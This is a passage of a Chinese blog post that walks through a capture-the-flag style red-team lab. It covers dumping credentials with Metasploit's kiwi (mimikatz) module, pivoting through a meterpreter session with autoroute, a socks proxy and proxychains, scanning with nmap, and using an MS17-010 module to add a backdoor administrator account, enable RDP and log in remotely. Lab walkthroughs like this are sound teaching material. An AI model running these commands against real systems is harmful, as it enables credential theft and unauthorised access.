<p><img src="https://img-blog.csdnimg.cn/img_convert/4c21229ed224c103c8b671a7d2bccda9.png" alt="image-20231117160104658"></p>
<p>这是因为当系统为win10或2012R2以上时，默认在内存缓存中禁止保存明文密码，密码字段显示为null，需要修改注册表等用户重新登录后才能成功抓取。</p>
<p><a target="_blank" rel="noopener" href="http://t.csdnimg.cn/BVX4w">MSF使用_MSF中kiwi(mimikatz)模块的使用</a></p>
<p>尝试抓取域内的账号密码：利用 msf 的 kiwi 模块</p>
<pre class=" language-bash"><code class="language-bash">load kiwi <span class="token comment" spellcheck="true">#加载kiwi模块</span>
<span class="token function">help</span> kiwi <span class="token comment" spellcheck="true">#查看kiwi模块的使用</span>
</code></pre>
<p>注意执行需要system权限</p>
<pre class=" language-bash"><code class="language-bash">creds_all         <span class="token comment" spellcheck="true">#列举所有凭据</span>
creds_kerberos    <span class="token comment" spellcheck="true">#列举域内账号密码</span>
</code></pre>
<h3 id="横向移动-1"><a href="#横向移动-1" class="headerlink" title="横向移动"></a>横向移动</h3><p>为了让 msf 能访问内网的其他主机，即 52 网段的攻击流量都通过已渗透的这台目标主机（Windows7）的meterpreter会话来传递，需要建立socks反向代理。</p>
<blockquote>
<p>注：添加路由一定要在挂代理之前，因为代理需要用到路由功能</p>
</blockquote>
<h4 id="添加路由、挂上Socks4a代理"><a href="#添加路由、挂上Socks4a代理" class="headerlink" title="添加路由、挂上Socks4a代理"></a>添加路由、挂上Socks4a代理</h4><p>使用 msf+proxychains 搭建socks4a隧道，<strong>设置内网路由</strong></p>
<pre><code>run autoroute -s 192.168.52.0/24  # 添加内网的路由
run autoroute -p  # 查看路由
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/e942b6f3da487b2938f041d30ab0141d.png" alt="image-20231117162817587"></p>
<p>暂时把会话挂起来<code>background</code></p>
<pre><code>use auxiliary/server/socks_proxy    //使用socks代理

set SRVHOST 10.9.75.3        //MSF本机的IP地址

set VERSION 4a                      //设置socks代理的版本

exploit            //开始代理
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/3da7dcfb6dbfb3ab54b6f6f293f1a1a3.png" alt="image-20231117163312002"></p>
<p>然后在 proxychains 的配置文件<code> /etc/proxychains4.conf</code>，添加Kali本机的1080端口：</p>
<pre class=" language-bash"><code class="language-bash"><span class="token function">sudo</span> vim /etc/proxychains4.conf 
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/021e7bf7d5043661b63d6333caed0e3e.png" alt="image-20231117163513812"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/102c49be58151dfd92d3d951d406d438.png" alt="image-20231117163500181"></p>
<p>然后执行命令时，前面加上 proxychains 即可</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/7cdcdffe5dcc5f4bc2f5bf4aad1ac69d.png" alt="image-20231117163748098"></p>
<h4 id="nmap漏洞扫描"><a href="#nmap漏洞扫描" class="headerlink" title="nmap漏洞扫描"></a>nmap漏洞扫描</h4><pre class=" language-bash"><code class="language-bash">proxychains nmap --script<span class="token operator">=</span>vuln 192.168.52.141
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/366a386963c93219d490b4a35756057f.png" alt="image-20231117171504026"></p>
<h4 id="ms17-010命令执行"><a href="#ms17-010命令执行" class="headerlink" title="ms17-010命令执行"></a>ms17-010命令执行</h4><p>知道了目标主机中存在一些漏洞：MS08-067、MS17-010等等，我们就可以用MS17-010的EXP来拿下目标主机，MS17-010的EXP打不了，它这个漏洞有很多莫名其妙的问题，很多其它的因素会导致各种各样的问题出现，打不了并不代表这个漏洞利用不了，有别的玩法，同样也是用MS17-010，MS17-010这个漏洞不光是可以用来拿权限，我们还可以用它来干其它的操作，比如说我们可以用这个漏洞来添加一个账户，因此我们需要用到对应的一个模块，在kali的具有MSF的那个终端中输入命令：这个模块可以在MSF中输入search ms17-010来搜索到，输入完命令之后，会出现很多模块</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/0b00f10ffe04f08576438c14743a567e.png" alt="image-20231117165747432"></p>
<pre class=" language-bash"><code class="language-bash"><span class="token keyword">set</span> rhosts 192.168.52.141        //设置IP地址为目标主机的IP地址

<span class="token keyword">set</span> COMMAND net user hack 123.com /add    //设置要添加的账号和密码，密码在设置的时候要注意：这里的密码设置有一个策略的问题存在，所以我们在设置密码的时候需要搞得复杂一点，不然过不了

exploit        //执行
</code></pre>
<p>得到以下的结果，说明执行成功</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/3d87e9d47a7f8badb1b44c13b2870057.png" alt="image-20231117165716050"></p>
<p>继续执行，将创建的<code>hack</code>用户添加到管理员组</p>
<pre class=" language-bash"><code class="language-bash"><span class="token keyword">set</span> <span class="token function">command</span> net localgroup administrators hack /add
exploit
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/1eea79e4037c356005e0077305f08684.png" alt="image-20231117170031190"></p>
<p>查看用户是否添加到管理员组里面</p>
<pre class=" language-bash"><code class="language-bash"><span class="token keyword">set</span> <span class="token function">command</span> net localgroup administrators
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/9adc2a59d321135b448ae90ee91106e5.png" alt="image-20231117170149311"></p>
<p>开启3389</p>
<p>因为开启3389端口命令中有两个双引号，如果整条命令外面不用单引号扩一下或者用双引号扩了，会出现一些符号闭合上的问题</p>
<pre class=" language-bash"><code class="language-bash"><span class="token keyword">set</span> <span class="token function">command</span> <span class="token string">'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'</span>
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/5b60a7028997e44cf814b153c7e42442.png" alt="image-20231117173256819"></p>
<h4 id="rdesktop远程连接"><a href="#rdesktop远程连接" class="headerlink" title="rdesktop远程连接"></a>rdesktop远程连接</h4><p>安装rdesktop</p>
<pre class=" language-bash"><code class="language-bash"><span class="token function">sudo</span> apt <span class="token function">install</span> rdesktop
</code></pre>
<pre class=" language-bash"><code class="language-bash">proxychains rdesktop 192.168.52.141
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/img_convert/6c007cfba8601b31ed0f35b3a6623c88.png" alt="image-20231117173754393"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/c7595567e8968ed308a168caffce0b39.png" alt="image-20231117173835110"></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">秋刀鱼-</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://hxysaury.github.io/2023/11/17/target-test/att-ck-shi-zhan-xi-lie-hong-dui-shi-zhan-yi/">https://hxysaury.github.io/2023/11/17/target-test/att-ck-shi-zhan-xi-lie-hong-dui-shi-zhan-yi/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">秋刀鱼-</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/Hongri/">
                                    <span class="chip bg-color">Hongri</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.png" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2023/11/17/target-test/att-ck-shi-zhan-xi-lie-hong-dui-shi-zhan-yi/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/18.jpg" class="responsive-img" alt="ATT&amp;CK实战系列——红队实战（一）">
                        
                        <span class="card-title">ATT&amp;CK实战系列——红队实战（一）</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-11-17
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E9%9D%B6%E6%9C%BA/" class="post-category">
                                    靶机
                                </a>
                            
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Hongri/">
                        <span class="chip bg-color">Hongri</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2023/10/29/target-test/zang-niu-lampiao/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/17.jpg" class="responsive-img" alt="【Vulnhub靶机】DirtyCow">
                        
                        <span class="card-title">【Vulnhub靶机】DirtyCow</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-10-29
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E9%9D%B6%E6%9C%BA/" class="post-category">
                                    靶机
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Vulnhub/">
                        <span class="chip bg-color">Vulnhub</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: 秋刀鱼-<br />'
            + '文章作者: 秋刀鱼-<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h1, h2, h3, h4, h5, h6'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4, h5, h6').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2020-2023</span>
            
            <span id="year">2020</span>
            <a href="/about" target="_blank">秋刀鱼-</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">232.7k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2020";
                    var startMonth = "10";
                    var startDate = "1";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/hxysaury" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:318129549@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=318129549" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 318129549" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>






    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

	
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
